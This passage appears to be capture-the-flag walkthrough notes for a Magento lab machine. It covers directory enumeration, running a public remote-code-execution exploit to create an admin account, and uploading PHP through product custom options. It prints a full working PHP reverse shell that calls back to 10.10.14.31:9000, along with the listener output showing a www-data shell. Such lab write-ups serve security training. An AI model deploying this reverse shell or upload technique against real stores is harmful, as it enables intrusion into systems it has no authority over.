2 :80

$ gobuster dir -u 10.10.10.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,html,txt
===============================================================
/index.php            (Status: 200) [Size: 16097]
/media                (Status: 301) [Size: 312] [--> http://10.10.10.140/media/]
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.140/includes/]
/lib                  (Status: 301) [Size: 310] [--> http://10.10.10.140/lib/]
/install.php          (Status: 200) [Size: 44]
/app                  (Status: 301) [Size: 310] [--> http://10.10.10.140/app/]
/js                   (Status: 301) [Size: 309] [--> http://10.10.10.140/js/]
/api.php              (Status: 200) [Size: 37]
/shell                (Status: 301) [Size: 312] [--> http://10.10.10.140/shell/]
/skin                 (Status: 301) [Size: 311] [--> http://10.10.10.140/skin/]
/cron.php             (Status: 200) [Size: 0]
/LICENSE.html         (Status: 200) [Size: 10679]
/LICENSE.txt          (Status: 200) [Size: 10410]
/var                  (Status: 301) [Size: 310] [--> http://10.10.10.140/var/]
/errors               (Status: 301) [Size: 313] [--> http://10.10.10.140/errors/]
/mage                 (Status: 200) [Size: 1319]

$ searchsploit magento
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
------------------------------------------------------------------------ ---------------------------------
Magento eCommerce - Remote Code Execution                              | xml/webapps/37977.py

Set the `target` variable in 37977.py to http://10.10.10.140/index.php before running it.

$ python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds kashz1:kashz1

Magento ver. 1.9.0.0
Tried using https://www.exploit-db.com/exploits/37811; did not work.

Catalog > Manage Products > Select a product > Edit > Custom Options > Add New Option
Input Type = File
Allowed File Extensions = .php
Save

Go to the product's storefront page, choose shell.php for the new file option and add the product to the cart; the file is written (with a random name) under:
http://10.10.10.140/media/custom_options/quote/<RANDOM-PATH>
Requesting that URL runs the uploaded PHP.
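Added example, not the page's own shell.php: a minimal PHP reverse shell of the kind uploaded through the custom file option above. It assumes the listener is the nc on 10.10.14.31:9000 shown below; change those two values for any other setup.

```php
<?php
// Added example (not from the original notes): minimal PHP reverse shell.
// Assumed attacker listener: 10.10.14.31:9000 (matches the nc -lvnp 9000 below).
$ip   = '10.10.14.31';
$port = 9000;

// Connect back to the listener; give up after 30 seconds.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    die("connect failed: $errstr ($errno)\n");
}

// Attach the child's stdin, stdout and stderr straight to the TCP socket,
// so commands typed in nc reach /bin/sh and its output comes back over
// the same connection. No pipe-shuffling loop is needed this way.
$descriptors = [
    0 => $sock,
    1 => $sock,
    2 => $sock,
];

$proc = proc_open('/bin/sh -i', $descriptors, $pipes);
if (!is_resource($proc)) {
    die("proc_open failed\n");
}

// Block until the shell exits, then clean up.
proc_close($proc);
fclose($sock);
```

This only fires if the web server executes PHP under /media/ (it did here), and the request that triggers it blocks until the shell is closed, so start the listener first.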

$ rlwrap nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.140] 57270
SOCKET: Shell has connected! PID: 1969
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
